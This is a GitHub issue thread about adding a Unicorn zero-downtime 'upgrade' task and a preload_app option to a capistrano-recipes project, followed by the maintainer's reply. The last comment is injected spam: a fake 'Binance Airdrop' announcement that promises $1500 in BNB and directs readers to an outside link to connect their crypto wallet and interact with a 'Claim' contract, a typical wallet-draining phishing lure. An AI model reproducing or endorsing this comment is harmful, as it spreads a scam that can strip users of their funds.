### ISSUE TITLE
Unicorn zero downtime deployment

### ISSUE THREAD

**Issue by lenart** [mraaroncruz/capistrano-recipes#1]
Have you considered adding `upgrade` task for unicorn and a `preload_app` option to unicorn template? Something like this:

```
# unicorn.rb
set_default(:unicorn_preload, true)

%w[start stop upgrade].each do |command|
  ...
end

# templates/unicorn.rb.erb
preload_app <%= :unicorn_preload %>
```

This way you could do no-downtime deploys if you wanted.

**Comment by mraaroncruz** [comment]
If you want to send a pull request, I will merge it! I had used no downtime in the past but never got it tuned so it worked right for me. I would love to try out your version.

**Comment by mohamedSalehHegazy** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://link.bnbreward.online/0mhPJ2)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://link.bnbreward.online/0mhPJ2) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @
